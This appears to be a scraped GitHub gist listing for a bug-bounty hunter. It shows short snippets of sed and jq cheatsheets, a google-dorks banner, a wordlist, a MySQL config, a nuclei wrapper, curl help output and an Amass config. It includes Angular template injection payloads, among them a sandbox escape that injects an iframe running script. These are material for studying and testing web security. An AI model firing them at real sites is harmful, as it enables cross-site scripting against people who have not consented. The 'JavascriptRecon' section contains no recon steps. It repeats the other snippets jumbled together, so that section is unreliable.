Tarek bugpie54

## sed cheatsheet

FILE SPACING:

 # double space a file
 sed G

 # double space a file which already has blank lines in it. Output file
 # should contain no more than one blank line between lines of text.
 sed '/^$/d;G'

## jq-cheetsheet.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                bugpie54
                / jq-cheetsheet.md
            
            
              Created
              July 31, 2021 18:51
                — forked from olih/jq-cheetsheet.md
            
              
                jq Cheet Sheet
              
          
    Processing JSON using jq

jq is useful to slice, filter, map and transform structured json data.
Installing jq

On Mac OS

brew install jq

  
## google-dorks

"          _                      _          "
"   _     /||       .   .        ||\     _   "
"  ( }    \||D    '   '     '   C||/    { %  "
" | /\__,=_[_]   '  .   . '       [_]_=,__/\ |"
" |_\_  |----|                    |----|  _/_|"
" |  |/ |    |                    |    | \|  |"
" |  /_ |    |                    |    | _\  |"

	It is all fun and games until someone gets hacked!

## all.txt

.
..
........
@
*
*.*
*.*.*
ðŸŽ

## AngularTI.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                bugpie54
                / AngularTI.md
            
            
              Created
              March 12, 2021 11:19
                — forked from mccabe615/AngularTI.md
            
              
                Angular Template Injection Payloads
              
          
    1.3.2 and below

{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';


## my.cnf
[client]
port    = 3306
socket  = /var/run/mysqld/mysqld.sock

# This was formally known as [safe_mysqld]. Both versions are currently parsed.
[mysqld_safe]
socket  = /var/run/mysqld/mysqld.sock
nice    = 0
syslog

## nucleir.sh
nucleir() {
	local TPL="$HOME/Documents/nuclei-templates"

	[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
	[[ -z "${2}" ]] && { echo "Input target?"; return; }

	local T=""

	for i in `ls -1d ${TPL}/*/`; do
		if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then

## curl-options-list.txt
$ curl --help
Usage: curl [options...] <url>
     --abstract-unix-socket <path> Connect via abstract Unix domain socket
     --alt-svc <file name> Enable alt-svc with this cache file
     --anyauth       Pick any authentication method
 -a, --append        Append to target file when uploading
     --basic         Use HTTP Basic Authentication
     --cacert <file> CA certificate to verify peer against
     --capath <dir>  CA directory to verify peer against
 -E, --cert <certificate[:password]> Client certificate file and password

## Amass Config
# Copyright 2017-2020 Jeff Foley. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.

# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
mode = active

# The directory that stores the Cayley graph database and other output files
# The default for Linux systems is: $HOME/.config/amass
#output_directory = amass

## JavascriptRecon.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                bugpie54
                / JavascriptRecon.md
            
            
              Created
              February 2, 2021 06:04
            
              
                My Javascript Recon Process - BugBounty
              
          
    Description

This is a simple guide to perform javascript recon in the bugbounty
Steps


The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)

	FILE SPACING:

	# double space a file
	sed G

	# double space a file which already has blank lines in it. Output file
	# should contain no more than one blank line between lines of text.
	sed '/^$/d;G'

	" _ _ "
	" _ /\|\| . . \|\|\ _ "
	" ( } \\|\|D ' ' ' C\|\|/ { % "
	" \| /\__,=_[_] ' . . ' [_]_=,__/\ \|"
	" \|_\_ \|----\| \|----\| _/_\|"
	" \| \|/ \| \| \| \| \\| \|"
	" \| /_ \| \| \| \| _\ \|"

	It is all fun and games until someone gets hacked!
	[client]
	port = 3306
	socket = /var/run/mysqld/mysqld.sock

	# This was formally known as [safe_mysqld]. Both versions are currently parsed.
	[mysqld_safe]
	socket = /var/run/mysqld/mysqld.sock
	nice = 0
	syslog
	nucleir() {
	local TPL="$HOME/Documents/nuclei-templates"

	[[ -z "${1}" ]] && { echo "-target/-l ?"; return; }
	[[ -z "${2}" ]] && { echo "Input target?"; return; }

	local T=""

	for i in `ls -1d ${TPL}/*/`; do
	if [[ ! "${i}" =~ (brute-force\|examples\|payloads) ]]; then
	$ curl --help
	Usage: curl [options...] <url>
	--abstract-unix-socket <path> Connect via abstract Unix domain socket
	--alt-svc <file name> Enable alt-svc with this cache file
	--anyauth Pick any authentication method
	-a, --append Append to target file when uploading
	--basic Use HTTP Basic Authentication
	--cacert <file> CA certificate to verify peer against
	--capath <dir> CA directory to verify peer against
	-E, --cert <certificate[:password]> Client certificate file and password
	# Copyright 2017-2020 Jeff Foley. All rights reserved.
	# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.

	# Should results only be collected passively and without DNS resolution? Not recommended.
	#mode = passive
	mode = active

	# The directory that stores the Cayley graph database and other output files
	# The default for Linux systems is: $HOME/.config/amass
	#output_directory = amass